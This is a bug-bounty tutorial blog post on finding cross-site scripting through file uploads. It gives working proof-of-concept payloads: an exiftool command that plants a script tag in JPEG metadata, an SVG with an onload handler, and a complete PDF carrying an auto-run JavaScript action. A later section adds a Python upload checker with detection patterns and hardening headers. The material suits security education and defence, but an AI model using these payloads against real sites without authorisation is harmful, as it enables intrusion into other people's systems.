Hey guys, this is TheToySec, back again with another post. In this post we will discuss file upload XSS and how to find XSS just by uploading a file during bug bounty hunting as well as penetration testing. So without further delay, let's start.
Before talking about file upload XSS, let's understand what XSS is.
XSS stands for cross-site scripting, a client-side injection vulnerability that allows an attacker to inject and execute malicious code in a website from the client side. For more information you can refer to What is XSS and XSS Cheat Sheet.
File Upload XSS

First, check the existing metadata of an image with ExifTool (here a test image named hello.jpg):
exiftool hello.jpg

Type the following command to write the XSS payload into the Artist tag with ExifTool:
exiftool -Artist='"><script>alert(1)</script>' hello.jpg
Let's confirm whether the payload is embedded in the metadata by running the following command again:
exiftool hello.jpg
In the output we can confirm the payload is successfully embedded. In my case I created a random image file named hello.jpg; you can use any name and embed any payload. Note that the script only executes if the application reads the Artist tag and inserts it into a page without output encoding; otherwise it is just inert text inside the file, which is exactly what stripping metadata on upload or encoding it on output achieves.
Find XSS by uploading SVG file
If the web application allows uploading files with the SVG extension, which is also an image type, then we can simply try to embed the XSS payload in an SVG file.
Here's how we can make an SVG file and embed the XSS payload.
Copy and paste the following code:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>
Now save it with the .svg extension, e.g. XSS.svg, and upload it to the web application where SVG files are allowed. If there is no proper sanitization of SVG files, then hopefully you'll get an XSS! Keep in mind that an SVG only runs script when the browser opens it as a document in the application's origin; an SVG referenced from an <img> tag does not, which is why serving uploads with a Content-Disposition: attachment header or from a separate origin defeats this.
Find XSS by uploading PDF
If there is a feature to upload PDF files, then we can simply try to embed the XSS payload in a PDF file.
Here's how we can make a PDF file and embed the payload for XSS.
Copy and paste the following code:
%PDF-1.3
%
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA <</O <</JS ( try { app.alert\("Hacked by none"\) } catch \(e\) { app.alert\(e.message\); } ) /S /JavaScript>>>> /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> /Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT /F1 24 Tf ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
Now save it with the .pdf extension, e.g. poc-1.pdf, and upload it to the web application where PDF files are allowed. If there is no proper sanitization of PDF files, then hopefully you'll get an XSS! The JavaScript here is attached to the page's /AA (additional actions) dictionary and runs inside the PDF viewer (app.alert is the Acrobat JavaScript API), so whether it fires depends on which viewer opens the file; a /JS or /JavaScript entry in an uploaded PDF is therefore a clear signal for a server-side check to reject the file.
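From the defender's side, all three tricks in this post leave a recognisable trace in the uploaded bytes: HTML in an image's metadata, an event handler or script element in an SVG, and a /JS or /AA entry in a PDF. The check below is added example code, not part of the original post: findings_for() applies heuristic patterns to an upload and safe_headers() gives the response headers that stop a missed payload from running in the application's origin. The sample files are constructed inline, and the pattern lists are an assumption of what is worth flagging, not an exhaustive sanitizer.

```python
import re
# Heuristic patterns for active content in "image"/"document" uploads. exiftool
# writes tags like Artist as plain text inside the JPEG, so a raw byte scan works.
IMAGE_ACTIVE = re.compile(rb"<script\b|javascript:|<svg\b", re.I)
SVG_ACTIVE = re.compile(rb"<script\b|\son[a-z]+\s*=|javascript:|<foreignObject\b", re.I)
PDF_ACTIVE = re.compile(rb"/JS\b|/JavaScript\b|/OpenAction\b|/AA\b|/Launch\b")
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "pdf": b"%PDF-"}

def findings_for(filename: str, data: bytes) -> list:
    """Return reasons to reject this upload; an empty list means nothing was found."""
    ext = filename.rsplit(".", 1)[-1].lower()
    issues = []
    if ext in ("jpg", "jpeg"):
        if not data.startswith(MAGIC[ext]):
            issues.append("magic bytes do not match extension")
        if IMAGE_ACTIVE.search(data):
            issues.append("HTML/script markup inside image bytes (metadata payload?)")
    elif ext == "svg":
        if SVG_ACTIVE.search(data):
            issues.append("SVG contains script, event handler or foreignObject")
    elif ext == "pdf":
        if not data.startswith(MAGIC["pdf"]):
            issues.append("magic bytes do not match extension")
        if PDF_ACTIVE.search(data):
            issues.append("PDF contains JavaScript or an automatic action")
    else:
        issues.append("extension not in allow-list")
    return issues

def safe_headers(filename: str) -> dict:
    """Headers for serving any upload: force download, forbid MIME sniffing and
    deny script, so a payload that slipped past findings_for() still cannot run."""
    clean = re.sub(r"[^\w.-]", "_", filename)  # keep the header value injection-free
    return {
        "Content-Disposition": f'attachment; filename="{clean}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

# Constructed samples (not real files): a JPEG header with an Artist tag of the
# kind exiftool writes, the SVG from the post, and a PDF fragment with /AA /JS.
SAMPLES = {
    "hello.jpg": b"\xff\xd8\xff\xe1Exif\x00\x00Artist\x00\"><script>alert(1)</script>",
    "clean.jpg": b"\xff\xd8\xff\xe0JFIF\x00 just pixels",
    "XSS.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>',
    "logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>',
    "poc-1.pdf": b"%PDF-1.3\n3 0 obj <</AA <</O <</JS (app.alert(1)) /S /JavaScript>>>>>>",
    "report.pdf": b"%PDF-1.3\n1 0 obj <</Type /Catalog>>",
}
```

Pattern matching alone is a tripwire, not a guarantee: re-encoding images through an image library (which drops metadata), rasterising SVGs, and serving every upload from a separate origin with the headers above are what actually close these vectors.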
Disclaimer: Hackerinthehouse, its author and its affiliates won't be responsible for any actions made by you. If you do anything illegal with the help of this article then you might be caught, and at that time do not use the name ToySec, ha ha ha 😂😂, just kidding. This article is published for security research and education purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.
If you really liked this post then give it a reaction and don't forget to share it with others. Till then, we will meet again on another interesting topic.
Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/
Thank you for reading this article and have a nice stay there!